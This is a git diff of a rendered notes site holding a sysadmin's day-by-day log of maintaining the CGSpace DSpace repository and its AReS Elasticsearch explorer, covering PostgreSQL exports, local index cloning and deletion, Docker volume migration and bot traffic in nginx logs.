                                                                                                                    104.198.97.97 - - [23/Feb/2021:11:41:17 +0100] "GET /rest/communities?limit=1000 HTTP/1.1" 200 188779 "https://cgspace.cgiar.org/rest /communities?limit=1000" "RTB website BOT"
                                                                                                                    -104.198.97.97 - - [23/Feb/2021:11:41:18 +0100] "GET /rest/communities//communities HTTP/1.1" 404 714 "https://cgspace.cgiar.org/rest/communities//communities" "RTB website BOT"
                                                                                                                    -
                                                                                                                      +
                                                                                                                      104.198.97.97 - - [23/Feb/2021:11:41:17 +0100] "GET /rest/communities?limit=1000 HTTP/1.1" 200 188779 "https://cgspace.cgiar.org/rest /communities?limit=1000" "RTB website BOT"
                                                                                                                      +104.198.97.97 - - [23/Feb/2021:11:41:18 +0100] "GET /rest/communities//communities HTTP/1.1" 404 714 "https://cgspace.cgiar.org/rest/communities//communities" "RTB website BOT"
                                                                                                                      +
                                                                                                                      • The first request is OK, but the second one is malformed for sure

                                                                                                                      2021-02-24

                                                                                                                      • Export a list of journals for Peter to look through:
                                                                                                                      -
                                                                                                                      localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.journal", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=251 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-02-24-journals.csv WITH CSV HEADER;
                                                                                                                      -COPY 3345
                                                                                                                      -
                                                                                                                        +
                                                                                                                        localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.journal", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=251 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-02-24-journals.csv WITH CSV HEADER;
                                                                                                                        +COPY 3345
                                                                                                                        +
                                                                                                                        • Start a fresh harvesting on AReS because Udana mapped some items today and wants to include them in his report:
                                                                                                                        -
                                                                                                                        $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                        -# start indexing in AReS
                                                                                                                        -
                                                                                                                          +
                                                                                                                          $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                          +# start indexing in AReS
                                                                                                                          +
                                                                                                                          • Also, I want to include the new series name/number cleanups so it’s not a total waste of time

                                                                                                                          2021-02-25

                                                                                                                          • Hmm the AReS harvest last night seems to have finished successfully, but the number of items is less than I was expecting:
                                                                                                                          -
                                                                                                                          $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                                                                          -{
                                                                                                                          -  "count" : 99546,
                                                                                                                          -  "_shards" : {
                                                                                                                          -    "total" : 1,
                                                                                                                          -    "successful" : 1,
                                                                                                                          -    "skipped" : 0,
                                                                                                                          -    "failed" : 0
                                                                                                                          -  }
                                                                                                                          -}
                                                                                                                          -
                                                                                                                            +
                                                                                                                            $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                                                                            +{
                                                                                                                            +  "count" : 99546,
                                                                                                                            +  "_shards" : {
                                                                                                                            +    "total" : 1,
                                                                                                                            +    "successful" : 1,
                                                                                                                            +    "skipped" : 0,
                                                                                                                            +    "failed" : 0
                                                                                                                            +  }
                                                                                                                            +}
                                                                                                                            +
                                                                                                                            • The current items index has 101380 items… I wonder what happened
                                                                                                                              • I started a new indexing
                                                                                                                              • @@ -843,9 +843,9 @@ COPY 3345
                                                                                                                            -
                                                                                                                            value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/\(.*\)/,"")
                                                                                                                            -value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^\d+\((\d+)\)/,"$1")
                                                                                                                            -
                                                                                                                              +
                                                                                                                              value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/\(.*\)/,"")
                                                                                                                              +value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^\d+\((\d+)\)/,"$1")
                                                                                                                              +
                                                                                                                              • This value.partition was new to me… and it took me a bit of time to figure out whether I needed to escape the parentheses in the issue number or not (no) and how to reference a capture group with value.replace
                                                                                                                              • I tried to check the 1095 CIFOR records from last week for duplicates on DSpace Test, but the page says “Processing” and never loads
                                                                                                                                  @@ -857,27 +857,27 @@ value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^\d+\((\d+)\)/,"$1")
                                                                                                                                • Niroshini from IWMI is still having issues adding WLE subjects to items during the metadata review step in the workflow
                                                                                                                                • It seems the BatchEditConsumer log spam is gone since I applied Atmire’s patch
                                                                                                                                -
                                                                                                                                $ grep -c 'BatchEditConsumer should not have been given' dspace.log.2021-02-[12]*
                                                                                                                                -dspace.log.2021-02-10:5067
                                                                                                                                -dspace.log.2021-02-11:2647
                                                                                                                                -dspace.log.2021-02-12:4231
                                                                                                                                -dspace.log.2021-02-13:221
                                                                                                                                -dspace.log.2021-02-14:0
                                                                                                                                -dspace.log.2021-02-15:0
                                                                                                                                -dspace.log.2021-02-16:0
                                                                                                                                -dspace.log.2021-02-17:0
                                                                                                                                -dspace.log.2021-02-18:0
                                                                                                                                -dspace.log.2021-02-19:0
                                                                                                                                -dspace.log.2021-02-20:0
                                                                                                                                -dspace.log.2021-02-21:0
                                                                                                                                -dspace.log.2021-02-22:0
                                                                                                                                -dspace.log.2021-02-23:0
                                                                                                                                -dspace.log.2021-02-24:0
                                                                                                                                -dspace.log.2021-02-25:0
                                                                                                                                -dspace.log.2021-02-26:0
                                                                                                                                -dspace.log.2021-02-27:0
                                                                                                                                -dspace.log.2021-02-28:0
                                                                                                                                -
                                                                                                                                +
                                                                                                                                $ grep -c 'BatchEditConsumer should not have been given' dspace.log.2021-02-[12]*
                                                                                                                                +dspace.log.2021-02-10:5067
                                                                                                                                +dspace.log.2021-02-11:2647
                                                                                                                                +dspace.log.2021-02-12:4231
                                                                                                                                +dspace.log.2021-02-13:221
                                                                                                                                +dspace.log.2021-02-14:0
                                                                                                                                +dspace.log.2021-02-15:0
                                                                                                                                +dspace.log.2021-02-16:0
                                                                                                                                +dspace.log.2021-02-17:0
                                                                                                                                +dspace.log.2021-02-18:0
                                                                                                                                +dspace.log.2021-02-19:0
                                                                                                                                +dspace.log.2021-02-20:0
                                                                                                                                +dspace.log.2021-02-21:0
                                                                                                                                +dspace.log.2021-02-22:0
                                                                                                                                +dspace.log.2021-02-23:0
                                                                                                                                +dspace.log.2021-02-24:0
                                                                                                                                +dspace.log.2021-02-25:0
                                                                                                                                +dspace.log.2021-02-26:0
                                                                                                                                +dspace.log.2021-02-27:0
                                                                                                                                +dspace.log.2021-02-28:0
                                                                                                                                +
                                                                                                                                diff --git a/docs/2021-03/index.html b/docs/2021-03/index.html index 6b8b34152..82c2d96ac 100644 --- a/docs/2021-03/index.html +++ b/docs/2021-03/index.html @@ -34,7 +34,7 @@ Also, we found some issues building and running OpenRXV currently due to ecosyst "/> - + @@ -163,19 +163,19 @@ Also, we found some issues building and running OpenRXV currently due to ecosyst
                                                                                                                                • I looked at the number of connections in PostgreSQL and it’s definitely high again:
                                                                                                                                -
                                                                                                                                $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                -1020
                                                                                                                                -
                                                                                                                                  +
                                                                                                                                  $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                  +1020
                                                                                                                                  +
                                                                                                                                  • I reported it to Atmire to take a look, on the same issue we had been tracking this before
                                                                                                                                  • Abenet asked me to add a new ORCID for ILRI staff member Zoe Campbell
                                                                                                                                  • I added it to the controlled vocabulary and then tagged her existing items on CGSpace using my add-orcid-identifier.py script:
                                                                                                                                  -
                                                                                                                                  $ cat 2021-03-04-add-zoe-campbell-orcid.csv 
                                                                                                                                  -dc.contributor.author,cg.creator.identifier
                                                                                                                                  -"Campbell, Zoë","Zoe Campbell: 0000-0002-4759-9976"
                                                                                                                                  -"Campbell, Zoe A.","Zoe Campbell: 0000-0002-4759-9976"
                                                                                                                                  -$ ./ilri/add-orcid-identifiers-csv.py -i 2021-03-04-add-zoe-campbell-orcid.csv -db dspace -u dspace -p 'fuuu'
                                                                                                                                  -
                                                                                                                                    +
                                                                                                                                    $ cat 2021-03-04-add-zoe-campbell-orcid.csv 
                                                                                                                                    +dc.contributor.author,cg.creator.identifier
                                                                                                                                    +"Campbell, Zoë","Zoe Campbell: 0000-0002-4759-9976"
                                                                                                                                    +"Campbell, Zoe A.","Zoe Campbell: 0000-0002-4759-9976"
                                                                                                                                    +$ ./ilri/add-orcid-identifiers-csv.py -i 2021-03-04-add-zoe-campbell-orcid.csv -db dspace -u dspace -p 'fuuu'
                                                                                                                                    +
                                                                                                                                    • I still need to do cleanup on the journal articles metadata
                                                                                                                                      • Peter sent me some cleanups but I can’t use them in the search/replace format he gave
                                                                                                                                      • @@ -183,9 +183,9 @@ $ ./ilri/add-orcid-identifiers-csv.py -i 2021-03-04-add-zoe-campbell-orcid.csv -
                                                                                                                                    -
                                                                                                                                    localhost/dspace63= > \COPY (SELECT dspace_object_id AS id, text_value as "cg.journal" FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=251) to /tmp/2021-02-24-journals.csv WITH CSV HEADER;
                                                                                                                                    -COPY 32087
                                                                                                                                    -
                                                                                                                                      +
                                                                                                                                      localhost/dspace63= > \COPY (SELECT dspace_object_id AS id, text_value as "cg.journal" FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=251) to /tmp/2021-02-24-journals.csv WITH CSV HEADER;
                                                                                                                                      +COPY 32087
                                                                                                                                      +
                                                                                                                                      • I used OpenRefine to remove all journal values that didn’t have one of these values: ; ( )
                                                                                                                                        • Then I cloned the cg.journal field to cg.volume and cg.issue
                                                                                                                                        • @@ -193,10 +193,10 @@ COPY 32087
                                                                                                                                      -
                                                                                                                                      value.partition(';')[0].trim() # to get journal names
                                                                                                                                      -value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^(\d+)\(\d+\)/,"$1") # to get journal volumes
                                                                                                                                      -value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^\d+\((\d+)\)/,"$1") # to get journal issues
                                                                                                                                      -
                                                                                                                                        +
                                                                                                                                        value.partition(';')[0].trim() # to get journal names
                                                                                                                                        +value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^(\d+)\(\d+\)/,"$1") # to get journal volumes
                                                                                                                                        +value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^\d+\((\d+)\)/,"$1") # to get journal issues
                                                                                                                                        +
                                                                                                                                        • Then I uploaded the changes to CGSpace using dspace metadata-import
                                                                                                                                        • Margarita from CCAFS was asking about an error deleting some items that were showing up in Google and should have been private
                                                                                                                                            @@ -233,14 +233,14 @@ value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^\d+\((\d+)\)/,"$1") # t
                                                                                                                                            • I migrated the Docker bind mount for the AReS Elasticsearch container to a Docker volume:
                                                                                                                                            -
                                                                                                                                            $ docker-compose -f docker/docker-compose.yml down
                                                                                                                                            -$ docker volume create docker_esData_7
                                                                                                                                            -$ docker container create --name es_dummy -v docker_esData_7:/usr/share/elasticsearch/data:rw elasticsearch:7.6.2
                                                                                                                                            -$ docker cp docker/esData_7/nodes es_dummy:/usr/share/elasticsearch/data
                                                                                                                                            -$ docker rm es_dummy
                                                                                                                                            -# edit docker/docker-compose.yml to switch from bind mount to volume
                                                                                                                                            -$ docker-compose -f docker/docker-compose.yml up -d
                                                                                                                                            -
                                                                                                                                              +
                                                                                                                                              $ docker-compose -f docker/docker-compose.yml down
                                                                                                                                              +$ docker volume create docker_esData_7
                                                                                                                                              +$ docker container create --name es_dummy -v docker_esData_7:/usr/share/elasticsearch/data:rw elasticsearch:7.6.2
                                                                                                                                              +$ docker cp docker/esData_7/nodes es_dummy:/usr/share/elasticsearch/data
                                                                                                                                              +$ docker rm es_dummy
                                                                                                                                              +# edit docker/docker-compose.yml to switch from bind mount to volume
                                                                                                                                              +$ docker-compose -f docker/docker-compose.yml up -d
                                                                                                                                              +
                                                                                                                                              • The trick is that when you create a volume like “myvolume” from a docker-compose.yml file, Docker will create it with the name “docker_myvolume”
                                                                                                                                                • If you create it manually on the command line with docker volume create myvolume then the name is literally “myvolume”
                                                                                                                                                • @@ -249,39 +249,39 @@ $ docker-compose -f docker/docker-compose.yml up -d
                                                                                                                                                • I still need to make the changes to git master and add these notes to the pull request so Moayad and others can benefit
                                                                                                                                                • Delete the openrxv-items-temp index to test a fresh harvesting:
                                                                                                                                                -
                                                                                                                                                $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                -

                                                                                                                                                2021-03-05

                                                                                                                                                +
                                                                                                                                                $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                +

                                                                                                                                                2021-03-05

                                                                                                                                                • Check the results of the AReS harvesting from last night:
                                                                                                                                                -
                                                                                                                                                $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                                                                                                -{
                                                                                                                                                -  "count" : 101761,
                                                                                                                                                -  "_shards" : {
                                                                                                                                                -    "total" : 1,
                                                                                                                                                -    "successful" : 1,
                                                                                                                                                -    "skipped" : 0,
                                                                                                                                                -    "failed" : 0
                                                                                                                                                -  }
                                                                                                                                                -}
                                                                                                                                                -
                                                                                                                                                  +
                                                                                                                                                  $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                                                                                                  +{
                                                                                                                                                  +  "count" : 101761,
                                                                                                                                                  +  "_shards" : {
                                                                                                                                                  +    "total" : 1,
                                                                                                                                                  +    "successful" : 1,
                                                                                                                                                  +    "skipped" : 0,
                                                                                                                                                  +    "failed" : 0
                                                                                                                                                  +  }
                                                                                                                                                  +}
                                                                                                                                                  +
                                                                                                                                                  • Set the current items index to read only and make a backup:
                                                                                                                                                  -
                                                                                                                                                  $ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d' {"settings": {"index.blocks.write":true}}'
                                                                                                                                                  -$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-03-05
                                                                                                                                                  -
                                                                                                                                                    +
                                                                                                                                                    $ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d' {"settings": {"index.blocks.write":true}}'
                                                                                                                                                    +$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-03-05
                                                                                                                                                    +
                                                                                                                                                    • Delete the current items index and clone the temp one to it:
                                                                                                                                                    -
                                                                                                                                                    $ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                                                                                                                    -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                    -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                                                                                                                    -
                                                                                                                                                      +
                                                                                                                                                      $ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                                                                                                                      +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                      +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                                                                                                                      +
                                                                                                                                                      • Then delete the temp and backup:
                                                                                                                                                      -
                                                                                                                                                      $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                      -{"acknowledged":true}%
                                                                                                                                                      -$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-03-05'
                                                                                                                                                      -
                                                                                                                                                        +
                                                                                                                                                        $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                        +{"acknowledged":true}%
                                                                                                                                                        +$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-03-05'
                                                                                                                                                        +
                                                                                                                                                        -
                                                                                                                                                        $ curl -s 'http://localhost:9200/_alias/' | python -m json.tool | less
                                                                                                                                                        -...
                                                                                                                                                        -    "openrxv-items-final": {
                                                                                                                                                        -        "aliases": {
                                                                                                                                                        -            "openrxv-items": {}
                                                                                                                                                        -        }
                                                                                                                                                        -    },
                                                                                                                                                        -
                                                                                                                                                          +
                                                                                                                                                          $ curl -s 'http://localhost:9200/_alias/' | python -m json.tool | less
                                                                                                                                                          +...
                                                                                                                                                          +    "openrxv-items-final": {
                                                                                                                                                          +        "aliases": {
                                                                                                                                                          +            "openrxv-items": {}
                                                                                                                                                          +        }
                                                                                                                                                          +    },
                                                                                                                                                          +
                                                                                                                                                          • But on AReS production openrxv-items has somehow become a concrete index:
                                                                                                                                                          -
                                                                                                                                                          $ curl -s 'http://localhost:9200/_alias/' | python -m json.tool | less
                                                                                                                                                          -...
                                                                                                                                                          -    "openrxv-items": {
                                                                                                                                                          -        "aliases": {}
                                                                                                                                                          -    },
                                                                                                                                                          -    "openrxv-items-final": {
                                                                                                                                                          -        "aliases": {}
                                                                                                                                                          -    },
                                                                                                                                                          -    "openrxv-items-temp": {
                                                                                                                                                          -        "aliases": {}
                                                                                                                                                          -    },
                                                                                                                                                          -
                                                                                                                                                            +
                                                                                                                                                            $ curl -s 'http://localhost:9200/_alias/' | python -m json.tool | less
                                                                                                                                                            +...
                                                                                                                                                            +    "openrxv-items": {
                                                                                                                                                            +        "aliases": {}
                                                                                                                                                            +    },
                                                                                                                                                            +    "openrxv-items-final": {
                                                                                                                                                            +        "aliases": {}
                                                                                                                                                            +    },
                                                                                                                                                            +    "openrxv-items-temp": {
                                                                                                                                                            +        "aliases": {}
                                                                                                                                                            +    },
                                                                                                                                                            +
                                                                                                                                                            • I fixed the issue on production by cloning the openrxv-items index to openrxv-items-final, deleting openrxv-items, and then re-creating it as an alias:
                                                                                                                                                            -
                                                                                                                                                            $ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                            -$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-03-07
                                                                                                                                                            -$ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                            -$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-final
                                                                                                                                                            -$ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                                                                                                                            -$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                            -
                                                                                                                                                              +
                                                                                                                                                              $ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                              +$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-03-07
                                                                                                                                                              +$ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                              +$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-final
                                                                                                                                                              +$ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                                                                                                                              +$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                              +
                                                                                                                                                              • Delete backups and remove read-only mode on openrxv-items:
                                                                                                                                                              -
                                                                                                                                                              $ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-03-07'
                                                                                                                                                              -$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                                                                                                                              -
                                                                                                                                                                +
                                                                                                                                                                $ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-03-07'
                                                                                                                                                                +$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                                                                                                                                +
                                                                                                                                                                • Linode sent alerts about the CPU usage on CGSpace yesterday and the day before
                                                                                                                                                                  • Looking in the logs I see a few IPs making heavy usage on the REST API and XMLUI:
                                                                                                                                                                -
                                                                                                                                                                # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E '0[56]/Mar/2021' | goaccess --log-format=COMBINED -
                                                                                                                                                                -
                                                                                                                                                                  +
                                                                                                                                                                  # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E '0[56]/Mar/2021' | goaccess --log-format=COMBINED -
                                                                                                                                                                  +
                                                                                                                                                                  • I see the usual IPs for CCAFS and ILRI importer bots, but also 143.233.242.132 which appears to be for GARDIAN:
                                                                                                                                                                  -
                                                                                                                                                                  # zgrep '143.233.242.132' /var/log/nginx/access.log.1 | grep -c Delphi
                                                                                                                                                                  -6237
                                                                                                                                                                  -# zgrep '143.233.242.132' /var/log/nginx/access.log.1 | grep -c -v Delphi
                                                                                                                                                                  -6418
                                                                                                                                                                  -
                                                                                                                                                                    +
                                                                                                                                                                    # zgrep '143.233.242.132' /var/log/nginx/access.log.1 | grep -c Delphi
                                                                                                                                                                    +6237
                                                                                                                                                                    +# zgrep '143.233.242.132' /var/log/nginx/access.log.1 | grep -c -v Delphi
                                                                                                                                                                    +6418
                                                                                                                                                                    +
                                                                                                                                                                    • They seem to make requests twice, once with the Delphi user agent that we know and already mark as a bot, and once with a “normal” user agent
                                                                                                                                                                      • Looking in Solr I see they have been using this IP for awhile, as they have 100,000 hits going back into 2020
                                                                                                                                                                      • @@ -375,9 +375,9 @@ $ curl -X PUT "localhost:9200/openrxv-items/_set
                                                                                                                                                                    -
                                                                                                                                                                    $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                    -13
                                                                                                                                                                    -
                                                                                                                                                                      +
                                                                                                                                                                      $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                      +13
                                                                                                                                                                      +
                                                                                                                                                                      • On 2021-03-03 the PostgreSQL transactions started rising:

                                                                                                                                                                      PostgreSQL query length week

                                                                                                                                                                      @@ -409,10 +409,10 @@ $ curl -X PUT "localhost:9200/openrxv-items/_set
                                                                                                                                                                  -
                                                                                                                                                                  $ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                                  -$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-08
                                                                                                                                                                  -# start harvesting on AReS
                                                                                                                                                                  -
                                                                                                                                                                    +
                                                                                                                                                                    $ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                                    +$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-08
                                                                                                                                                                    +# start harvesting on AReS
                                                                                                                                                                    +
                                                                                                                                                                    • As I saw on my local test instance, even when you cancel a harvesting, it replaces the openrxv-items-final index with whatever is in openrxv-items-temp automatically, so I assume it will do the same now

                                                                                                                                                                    2021-03-09

                                                                                                                                                                    @@ -434,8 +434,8 @@ $ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items
                                                                                                                                                                -
                                                                                                                                                                $ ./ilri/doi-to-handle.py -i /tmp/dois.txt -o /tmp/handles.txt -db dspace -u dspace -p 'fuuu'
                                                                                                                                                                -

                                                                                                                                                                2021-03-10

                                                                                                                                                                +
                                                                                                                                                                $ ./ilri/doi-to-handle.py -i /tmp/dois.txt -o /tmp/handles.txt -db dspace -u dspace -p 'fuuu'
                                                                                                                                                                +

                                                                                                                                                                2021-03-10

                                                                                                                                                                • Colleagues from ICARDA asked about how we should handle ISI journals in CG Core, as CGSpace uses cg.isijournal and MELSpace uses mel.impact-factor
                                                                                                                                                                    @@ -444,12 +444,12 @@ $ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items
                                                                                                                                                                  • Peter said he doesn’t see “Source Code” or “Software” in the output type facet on the ILRI community, but I see it on the home page, so I will try to do a full Discovery re-index:
                                                                                                                                                                  -
                                                                                                                                                                  $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                                                                                                                                                  -
                                                                                                                                                                  -real    318m20.485s
                                                                                                                                                                  -user    215m15.196s
                                                                                                                                                                  -sys     2m51.529s
                                                                                                                                                                  -
                                                                                                                                                                    +
                                                                                                                                                                    $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                                                                                                                                                    +
                                                                                                                                                                    +real    318m20.485s
                                                                                                                                                                    +user    215m15.196s
                                                                                                                                                                    +sys     2m51.529s
                                                                                                                                                                    +
                                                                                                                                                                    • Now I see ten items for “Source Code” in the facets…
                                                                                                                                                                    • Add GPL and MIT licenses to the list of licenses on CGSpace input form since we will start capturing more software and source code
                                                                                                                                                                    • Added the ability to check dcterms.license values against the SPDX licenses in the csv-metadata-quality tool @@ -467,34 +467,34 @@ sys 2m51.529s
                                                                                                                                                                      • Switch to linux-kvm kernel on linode20 and linode18:
                                                                                                                                                                      -
                                                                                                                                                                      # apt update && apt full-upgrade
                                                                                                                                                                      -# apt install linux-kvm
                                                                                                                                                                      -# apt remove linux-generic linux-image-generic linux-headers-generic linux-firmware
                                                                                                                                                                      -# apt autoremove && apt autoclean
                                                                                                                                                                      -# reboot
                                                                                                                                                                      -
                                                                                                                                                                        +
                                                                                                                                                                        # apt update && apt full-upgrade
                                                                                                                                                                        +# apt install linux-kvm
                                                                                                                                                                        +# apt remove linux-generic linux-image-generic linux-headers-generic linux-firmware
                                                                                                                                                                        +# apt autoremove && apt autoclean
                                                                                                                                                                        +# reboot
                                                                                                                                                                        +
                                                                                                                                                                        • Deploy latest changes from 6_x-prod branch on CGSpace
                                                                                                                                                                        • Deploy latest changes from OpenRXV master branch on AReS
                                                                                                                                                                        • Last week Peter added OpenRXV to CGSpace: https://hdl.handle.net/10568/112982
                                                                                                                                                                        • Back up the current openrxv-items-final index on AReS to start a new harvest:
                                                                                                                                                                        -
                                                                                                                                                                        $ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                                        -$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-14
                                                                                                                                                                        -$ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                                                                                                                                        -
                                                                                                                                                                          +
                                                                                                                                                                          $ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                                          +$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-14
                                                                                                                                                                          +$ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                                                                                                                                          +
                                                                                                                                                                          • After the harvesting finished it seems the indexes got messed up again, as openrxv-items is an alias of openrxv-items-temp instead of openrxv-items-final:
                                                                                                                                                                          -
                                                                                                                                                                          $ curl -s 'http://localhost:9200/_alias/' | python -m json.tool | less
                                                                                                                                                                          -...
                                                                                                                                                                          -    "openrxv-items-final": {
                                                                                                                                                                          -        "aliases": {}
                                                                                                                                                                          -    },
                                                                                                                                                                          -    "openrxv-items-temp": {
                                                                                                                                                                          -        "aliases": {
                                                                                                                                                                          -            "openrxv-items": {}
                                                                                                                                                                          -        }
                                                                                                                                                                          -    },
                                                                                                                                                                          -
                                                                                                                                                                            +
                                                                                                                                                                            $ curl -s 'http://localhost:9200/_alias/' | python -m json.tool | less
                                                                                                                                                                            +...
                                                                                                                                                                            +    "openrxv-items-final": {
                                                                                                                                                                            +        "aliases": {}
                                                                                                                                                                            +    },
                                                                                                                                                                            +    "openrxv-items-temp": {
                                                                                                                                                                            +        "aliases": {
                                                                                                                                                                            +            "openrxv-items": {}
                                                                                                                                                                            +        }
                                                                                                                                                                            +    },
                                                                                                                                                                            +
                                                                                                                                                                            • Anyways, the number of items in openrxv-items seems OK and the AReS Explorer UI is working fine
                                                                                                                                                                              • I will have to manually fix the indexes before the next harvesting
                                                                                                                                                                              • @@ -535,54 +535,54 @@ $ curl -X PUT "localhost:9200/openrxv-items-fina
                                                                                                                                                                              • Back up the current openrxv-items-final index to start a fresh AReS Harvest:
                                                                                                                                                                              -
                                                                                                                                                                              $ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                                              -$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-21
                                                                                                                                                                              -$ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                                                                                                                                              -
                                                                                                                                                                                +
                                                                                                                                                                                $ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                                                +$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-21
                                                                                                                                                                                +$ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                                                                                                                                                +
                                                                                                                                                                                • Then start harvesting in the AReS Explorer admin UI

                                                                                                                                                                                2021-03-22

